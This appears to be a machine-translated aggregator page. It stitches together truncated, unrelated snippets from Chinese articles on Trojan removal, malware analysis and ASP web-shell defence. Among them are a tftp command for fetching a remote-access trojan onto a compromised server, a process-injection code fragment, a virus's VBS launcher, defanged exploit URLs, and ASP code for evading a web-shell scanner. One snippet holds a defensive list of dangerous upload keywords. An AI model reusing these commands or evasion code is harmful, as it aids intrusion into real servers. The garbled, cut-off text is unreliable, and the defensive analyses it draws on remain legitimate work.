An official website Trojan Trojan-PSW.Win32.OnLineGames.sbg
EndurerOriginal2008-02-291Version
1. The website homepage contains code:/------/
1.1 hxxp: // pop **. I ** Ms ** E *. CC/g3.htm contains the Code:/------/
1.1.1 hxxp: // pop **. I ** Ms ** E *. CC/news.html output code:/------/
1.1.1.1 hxxp: // X ** x * X. c ** Ka ** BC *. Net/ms06014.js
Download hxxp: // user ** 1 *. 1 ** A2B ** 3C * 0.net/bak.css
The trojan that took me a day to solve is really hard to find.
1. We found that the c: \ windows \ system32 \ 30pzg8d. dll file was infected with Trojan. DL. win32.hmir. HL but it could not be deleted, so we had to force it through the ice blade icesword.
3. Restart after deletion. rundll prompts that the 30pzg8d. dll module cannot be found, indicating that there are services or startup items that are
In addition, Trojan. psw. win32.qqpass, Trojan. psw. win32.gameol, etc. 1
Original endurer 2008-06-13 1st
A friend said that the real-time monitoring icons of the Rising anti-virus software and firewall software in his computer have disappeared recently, and the computer's response is very slow. Please help me with the repair.
Download pe_xscan to scan logs and analyze the logs. The following suspicious it
In general today, ASP Trojan often through the following four points to operate the server, so we just have to set all around to be able to from a
Before the use of IIS server webmaster a lot, especially for the ASP site, to prevent the ASP Trojan has become the site security of the most critical content.
In general today, ASP Trojan often through the following
Access via HTTP protocol
The use of a word trojan (I only listed 2 kinds):
1. Only database backup scenarios
When the database is backed up as an ASP file, there is no "compile error, missing script shutdown flag%>"
2) SA permission, usually first write a word, figure convenient. (Of course, direct tftp uploads pigeons run, that's quicker)
Tftp-i IP Get Server.exe
A word trojan
First of all know
The E
PHP Web Trojan scanner code sharing, PHP Web Trojan Scanner
No nonsense. paste the Code directly.
The Code is as follows:
The above code is shared by the php web Trojan scanner code. This article is accompanied by a comment. If you do not understand it, please leave a message for me. I believe there are more than one implementation method, you are welcome to sha
Virus Trojan scan and removal: compilation of the dedicated kill tool for QQ Trojan Horse stealingI. Preface as I have compiled a general kill tool framework in article 004th "virus Trojan scan: Writing pandatv killing tools, this framework is basically applicable to the virus after simple modification. Therefore, this article will not discuss the overlapping kno
Virus Trojan scan: Reverse Analysis of QQ Trojan Horse stealingI. Preface in this series of articles, if there are no special circumstances in the last part of Virus analysis, I will use reverse analysis to thoroughly analyze the target virus for readers. However, I used three articles (about 2500 words per article) for the previous "pandatv incense" virus to analyze only 1/3 of the virus, the core part of
thread code is placed in it VirtualAllocEx (Rphandle,null,cb,mem_commit,page_execute_readwrite); Writes the remote thread's code to the remote process's address space writeprocessmemory (RPHANDLE,REMOTETHR, (LPVOID) remote,cb,null); The parameters required by the remote thread are also written to the address space of the remote process writeprocessmemory (Rphandle,remotepar, (LPVOID) rp,cb,null); Create a remote monitoring thread CreateRemoteThread (rphandle,null,0, (Lpthread_start_rout
Encounter qfgsw. sys/Trojan-Downloader.Win32.Agent.bbb/Trojan. win32.agent. BVl, etc.
EndurerOriginalDecember1Version
Last night, a netizen said that the NOD32 in his computer was reported recently:
/---Time module object name virus operation User Name Information21:30:22 Amon file C:/Windows/system32/Drivers/qfgsw. sysWin32/trojandownloader. Agent. bbbTrojan has been deleted (the next time it is re-enabled
Trojan Horse program TROJAN-SPY.WIN32.AGENT.CFU
The sample program is a use of Delphi program, program using MEW 1.x shell attempt to evade signature scanning, length of 67,908 bytes, icon for Windows default icon, virus extension for EXE, the main way to spread the web page hanging horse, file bundle, hacker attacks.
Virus analysis
The sample program is activated to release the Systen.dll file to the%Sy
First determine the file size:
If File.filesize
After uploading the file to the server, determine the dangerous action characters in the user file:
Set MyFile = Server. CreateObject ("Scripting.FileSystemObject")
Set MyText = Myfile.opentextfile (FilePath, 1) ' reads text file
Stextall = LCase (mytext.readall)
mytext.close
Set MyFile = Nothing
sstr= ". getfolder|. createfolder|. deletefolder|. createdirectory|. deletedirectory|. SaveAs
|wscript.shell|script.encode|server.|.
Win32.loader. C, Trojan. psw. win32.gameonline, Trojan. psw. win32.asktao, etc. 2
EndurerOriginal1Version
Check that the last modification time of the EXE file on other disks except drive C is similar, and the file size increases, such as hijackthis 1.99.1 English version. The normal size is 218,112 bytes, the 223,585 byte after infection should be infected. No wonder the firewall prompts the program to acc
Scan the machine today and find a Trojan:
File: C: \ Program Files \ nuneos \ mumnos \ socesv. dllFile: C: \ Program Files \ nuneos \ mumnos \ sosvus. dllFile: C: \ Program Files \ nuneos \ micesv.exe
Microsoft's MSE scan report:
Category: Trojan
Description: This program is dangerous and executes commands from an attacker.
Recommendation: Remove this software immediately.
Microsoft Security Essenti
Latest virus Combination Auto.exe, game theft Trojan download manual killing
The following is a virus-enabled code Microsofts.vbs
Copy Code code as follows:
Set lovecuteqq = CreateObject ("Wscript.Shell")
Lovecuteqq.run ("C:\docume~1\admini~1\locals~1\temp\microsofts.pif")
Trojan Name: TROJAN-PSW/WIN32.ONLINEGAMES.LXT
Path: C:\WINDOWS\sys
Hanxiaolian
To avoid lake2 ASP Webmaster Admin Assistant and write.
A. Bypassing the Lake2 ASP Trojan scan Pony
Copy Code code as follows:
Set C = CreateObject ("ADOX.") Catalog ")
C.create ("Provider=Microsoft.Jet.OLEDB.4.0;Data source=" server.mappath ("a.asp"))
Set c = Nothing
Cserver.mappath ("a.asp")
Set Conn=server.createobject ("Adodb.connection")
Conn.Open ConnStr
Conn.execute ("CREATE Table Nomm (Nomuma oleobject)")
Set Rs
There are two sides to everything. This article introduces the Web Trojan production techniques, intended to strengthen the awareness of the prevention, rather than to "Shenring". Hope that we can bring some help to create a safe internet environment.
If you visit XX website (a domestic portal site), you will be in the gray pigeon Trojan. This is a hacker friend of mine said to me. Open the homepage of the
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.